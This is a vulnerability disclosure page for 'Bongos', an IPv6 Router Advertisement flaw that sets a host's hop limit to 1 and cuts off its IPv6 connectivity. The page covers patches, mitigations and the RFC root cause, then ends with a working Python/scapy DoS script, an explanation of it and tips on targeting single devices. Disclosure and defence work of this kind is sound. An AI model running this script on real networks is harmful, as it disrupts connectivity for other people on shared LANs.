Bongos


It's not the end of the internet

About Bongos

Bongos is a cross-platform LAN based security problem that leads to Denial of Service. It effectively ruins your device or computers ability to communicate over IPv6.

It requires an extremely low rate of packets, around one per second. It (usually) only works as long as the stream of packets is emitted.

This is not the end of the world. The following page will contain an FAQ, links to vulnerabilities, patches, protection, comments and more.

Contact us at info@modio.se for more information.

News

2015-04-23 - Fedora releases kernel update

Fedora users can now get an kernel update that includes a patch for Bongos.

[ 2 ] Bug #1203712 - CVE-2015-2922 kernel: denial of service (DoS) attack against IPv6 network stacks due to improper handling of Router Advertisements. https://bugzilla.redhat.com/show_bug.cgi?id=1203712


2015-04-16 - pfsense 2.2.2 patched

There is now a patch for pfsense

FreeBSD-SA-15:09.ipv6: Denial of Service with IPv6 Router Advertisements. Where a system is using DHCPv6 WAN type, devices on the same broadcast domain as that WAN can send crafted packets causing the system to lose IPv6 Internet connectivity.


2015-04-08 - CVE and patches

For the Linux kernel, we have CVE-2015-2922.
For FreeBSD, we have CVE-2015-2923 For NetworkManager there is CVE-2015-2924

Patches are part of Linux 4.0-rc7, and there is a FreeBSD advisory and DragonFly BSD


All the news

Preparation

Before we release details that may lead to reproduction of the issue, there are a few things that you can do. Both as a user, and as a systems administrator.

For everyone

  • Install your updates, automatically and quickly
  • Make sure your firewall is up to date and running

For the SysAdmins

  • Turn on IPv4 port-based DHCP filtering in your switches
  • Turn on port-based DHCPv6 filtering in your switches
  • Turn on port-based Router Advertisement filtering in your switches
  • Make sure you have host-based firewalls installed and enabled
  • Make sure you can quickly and automatically push updates to your host-based firewalls.
  • Make sure clients are on different networks/VLAN from your infrastructure
  • Make sure your networking infrastructure cannot be reached from normal clients

The above advice are the only ones we can give right now. We will update this section with proper firewall rules for some platforms, and more detailed advice once the updates have been pushed by vendors.

The cause

Many systems accept link-settings from a link-local RouterAdvertisement packet, that doesn't contain any route. This allows a link-local attacker to change interface level settings. More specifically, the Hop Limit

Result of the attack

Hop Limit is reduced to 1. This means that IPv6 packets originating from the device will be discarded after the first routing hop. This effectively disables IPv6 connectivity beyond the local network.

The root cause:

The ignored lines of RFC3756:

As an example, one possible approach to mitigate this threat is to ignore very small hop limits. The nodes could implement a configurable minimum hop limit, and ignore attempts to set it below said limit.

The obeyed lines of RFC4861:

  • The IP Hop Limit field has a value of 255, i.e., the packet could not possibly have been forwarded by a router.
  • ICMP Checksum is valid.
  • ICMP Code is 0.
  • ICMP length (derived from the IP length) is 16 or more octets.
  • All included options have a length that is greater than zero.

And most importantly:

If the received Cur Hop Limit value is non-zero, the host SHOULD set its CurHopLimit variable to the received value.

By implementing this, we are allowed to send a RA packet, without any options, no route, no nothing. And the client will accept the value, validate the small basics, and apply the hop limit to the interface

This then causes all outgoing traffic from the host to have a hop limit of 1, leading to an effective "Game Over".

By implementing the suggestions in RFC3756, this situation would have been avoidable. In fact, careful reading of RFC4861 suggests that a Router Advertisement without options, and with a lifetime != 0, can be considered an invalid RA packet, and should be discarded.

Questions and Answers

  • Is my data at risk?
  • No. There is no information leakage.
  • Can this stop the internet?
  • No. This attack is a local attack. It only affects devices near you.
  • Will I be affected?
  • Most likely, no. IPv6 is still not yet in wide deployment, and your device will likely get proper updates.
  • We use DHCPv6, are we still vulnerable?
  • Maybe. Even if your system only accepts routes via DHCPv6, it may still change the hop limit based on information from RA packets.
  • Can you crash computer with this?
  • No. Nothing is crashing, there is only a disruption of service. Like a dropped phone call.
  • Will this take down the internet?
  • No. At most it will affect the WiFi in the coffee shop. If you experience issues, turn off your device and enjoy the coffee.
  • What makes this attack so unique?
  • The really interesting thing about this attack is that so many vendors are affected by it. It's exceptionally rare that an attack works on Android, iOS, Windows, OS X, networking hardware and embedded devices at the same time.
  • How can I protect myself?
  • See our news and announcement pages, and the block labeled "Preparations". It will be updated when we can release more news.
  • Are there any other side effects?
  • On some mobile devices we can provoke crashes in some apps, because they do not handle errors very well. This is a bug in the app, and is fixed by restarting it.
  • What's the worst thing that happens?
  • We have observed higher power consumption on mobile devices, this seems to be related to background services failing to get connection, and trying over and over again. We expect this to be fixed at a later point by the vendors.
  • Why are so many vendors affected?
  • Most vendors didn't properly validate the input data from the network, and missed a small suggestion in a standards document.
  • What are the risks for the future?
  • The real risk are devices who do not get updates. Embedded, IoT, Networking or mobile devices that no longer get security updates from the vendor. For these devices, the problem will continue to grow as more and more networks enable IPv6.
  • How did you come across this?
  • We at Modio work with security on embedded and networked devices. It started with an obscure networking problem, and further investigation showed that it was a serious infrastructure problem.
  • Did you have to name the exploit?
  • No. But it is amazing how many devices are affected at the same time, so we think this was a good time to name an exploit.
  • Can you crash any app with this?
  • No, there is no way to target this at a specific app. You can only target an entire network, or a set of devices on the network.
  • My vendor hasn't released a patch for this, what can I do?
  • If you "root" the device, you can apply a local firewall to protect against attack. Otherwise the device will remain vulnerable. See the Preparations part for details.
  • Why is it named Bongos?
  • Because you have to keep the rhythmical drumming for this to work in practice.

Exploit code

The following code includes a DoS, and an undo afterwards. Simply press Ctrl-C once while drumming, and it will start the undo sequence.

bongos.py

#!/bin/python
import scapy.all
from scapy.layers.inet6 import *

ip = IPv6()
ip.dst = "ff02::1"
icmp = ICMPv6ND_RA()

icmp.chlim = 1
print("Starting Bongos with hoplimit {0}".format(icmp.chlim))
send(ip/icmp, loop=True, inter=1)

icmp.chlim = 64
print("Restoring with hoplimit {0}".format(icmp.chlim))
send(ip/icmp, loop=True, inter=1)

Run the above code as root and it should work.

Explanation

First we set up scapy and import the IPv6 functions:

import scapy.all
from scapy.layers.inet6 import *

Then we declare an empty IPv6 packet, and set the destination to be link-local:

ip = IPv6()
ip.dst = "ff02::1"

After this, we set up an ICMPv6 packet of type "NetworkDiscovery: RouterAdvertisement":

icmp = ICMPv6ND_RA()

Then we set the "CurrentHopLimit" (chlim) to 1, and fire it off to the network:

icmp.chlim = 1
send(ip/icmp, loop=True, inter=1)

We loop forever, sending one beat every second. There is no data-payload involved, only the empty RouterAdvertisement packet.

Once you press Ctrl-C, we restore the "CurrentHopLimit" to 64, and start another beat of the bongos. This is to restore any devices that are currently unavailable:

icmp.chlim = 64
send(ip/icmp, loop=True, inter=1)

More fun

This attack works both on the link-local Broadcast, and on a unicast. To target a single device, simply change the ip.dst variable.

Some other network stacks will get very upset if you also set the icmp.routerlifetime property of the packet down to 0.